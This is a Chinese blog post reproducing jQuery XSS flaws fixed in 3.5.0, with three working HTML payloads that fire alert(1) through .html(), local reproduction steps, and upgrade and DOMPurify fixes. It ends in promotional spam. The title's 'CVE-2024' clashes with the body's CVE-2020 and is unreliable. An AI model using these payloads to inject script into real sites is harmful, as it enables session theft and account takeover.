jQuery-XSS漏洞(CVE-2024-11022 CVE-2024-11023)_cve-2024-11023复现

200 阅读2分钟
<script src="js地址"></script>

jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)

PoCs of XSS bugs fixed in jQuery 3.5.0. You can find the details in my blog post: English / 日本語

PoC 1

Assign to innerHTML Append via .html() <style><style /><img src=x onerror=alert(1)>

PoC 2 (Only jQuery 3.x affected)

Assign to innerHTML Append via .html() <img alt="<x" title="/><img src=x onerror=alert(1)>">

PoC 3

Assign to innerHTML Append via .html() <option><style></option></select><img src=x onerror=alert(1)></style>

上面漏洞验证payload代码没有问题,有些可能由于编辑器问题,复制后有些许问题,这里我给出我本地使用的poc,大家下载修改js路径即可使用  
 链接:<https://pan.baidu.com/s/1O-wJsl_V8VBeiFVPvTCwyw>  
 提取码:peak


### 三、验证过程


1、找到存在漏洞的js文件  
 ![在这里插入图片描述](https://p6-xtjj-sign.byteimg.com/tos-cn-i-73owjymdk6/47a65b412442430692a4f6f654f246aa~tplv-73owjymdk6-jj-mark-v1:0:0:0:0:5o6Y6YeR5oqA5pyv56S-5Yy6IEAg5py65Zmo5a2m5Lmg5LmL5b-DQUk=:q75.awebp?rk3s=f64ab15b&x-expires=1771862961&x-signature=KoVdPyTP%2FRtdb1AvQ%2Bezo8RjO4k%3D)  
 2、打开上面的js文件,将上方payload代码中的js地址替换为下图中的地址  
 ![在这里插入图片描述](https://p6-xtjj-sign.byteimg.com/tos-cn-i-73owjymdk6/d6d83afd6f824bf297afa05c3a38b5ca~tplv-73owjymdk6-jj-mark-v1:0:0:0:0:5o6Y6YeR5oqA5pyv56S-5Yy6IEAg5py65Zmo5a2m5Lmg5LmL5b-DQUk=:q75.awebp?rk3s=f64ab15b&x-expires=1771862961&x-signature=i33MXZRxBF3pVptc8XXbeFLqfbI%3D)  
 3、替换后如下图  
 注:src链接可用https://www.example.com/jquery-v3.1.0/dist/jquery.min.js或//www.example.com/jquery-v3.1.0/dist/jquery.min.js  
 ![在这里插入图片描述](https://p6-xtjj-sign.byteimg.com/tos-cn-i-73owjymdk6/4f82603319064631bd4a4c4801a2b2d8~tplv-73owjymdk6-jj-mark-v1:0:0:0:0:5o6Y6YeR5oqA5pyv56S-5Yy6IEAg5py65Zmo5a2m5Lmg5LmL5b-DQUk=:q75.awebp?rk3s=f64ab15b&x-expires=1771862961&x-signature=CoZS2MA1R7eyjJPtrHE1mcw%2BGq4%3D)  
 4、将该html直接打开或放入www目录中打开  
 点击红框即可,我这里仅演示Poc1,其他Poc也可以  
 ![在这里插入图片描述](https://p6-xtjj-sign.byteimg.com/tos-cn-i-73owjymdk6/6f839de2806c423fbee0246e0804ef9b~tplv-73owjymdk6-jj-mark-v1:0:0:0:0:5o6Y6YeR5oqA5pyv56S-5Yy6IEAg5py65Zmo5a2m5Lmg5LmL5b-DQUk=:q75.awebp?rk3s=f64ab15b&x-expires=1771862961&x-signature=Lai7UFrlS354qOxTvdcOYgMN%2FaU%3D)  
 ![在这里插入图片描述](https://p6-xtjj-sign.byteimg.com/tos-cn-i-73owjymdk6/f8e80b82978948f0b9dcdb23acae0247~tplv-73owjymdk6-jj-mark-v1:0:0:0:0:5o6Y6YeR5oqA5pyv56S-5Yy6IEAg5py65Zmo5a2m5Lmg5LmL5b-DQUk=:q75.awebp?rk3s=f64ab15b&x-expires=1771862961&x-signature=1bwDreFBV9%2Fj%2BOzXortRyR5zKf0%3D)


### 四、修复


(1)更新jQuery到3.5.0或更高版本  
 <https://code.jquery.com/jquery-3.5.0.js>  
 (2)使用XSS清理工具清理用户输入的HTML  
 官方推荐:<https://github.com/cure53/DOMPurify>




**收集整理了一份《2024年最新物联网嵌入式全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升的朋友。**
![img](https://p6-xtjj-sign.byteimg.com/tos-cn-i-73owjymdk6/c05064971ca14265a1ea5e2db9df7059~tplv-73owjymdk6-jj-mark-v1:0:0:0:0:5o6Y6YeR5oqA5pyv56S-5Yy6IEAg5py65Zmo5a2m5Lmg5LmL5b-DQUk=:q75.awebp?rk3s=f64ab15b&x-expires=1771862961&x-signature=wNMRjdjDEZzXwF5%2FA5QRVYA%2B4h0%3D)
![img](https://p6-xtjj-sign.byteimg.com/tos-cn-i-73owjymdk6/7b38a6a689404b87ab83820b7f6975a7~tplv-73owjymdk6-jj-mark-v1:0:0:0:0:5o6Y6YeR5oqA5pyv56S-5Yy6IEAg5py65Zmo5a2m5Lmg5LmL5b-DQUk=:q75.awebp?rk3s=f64ab15b&x-expires=1771862961&x-signature=qalBdMcJC73GLnkDuYaYJnpRkn0%3D)

**[如果你需要这些资料,可以戳这里获取](https://gitee.com/vip204888)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人**

**都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**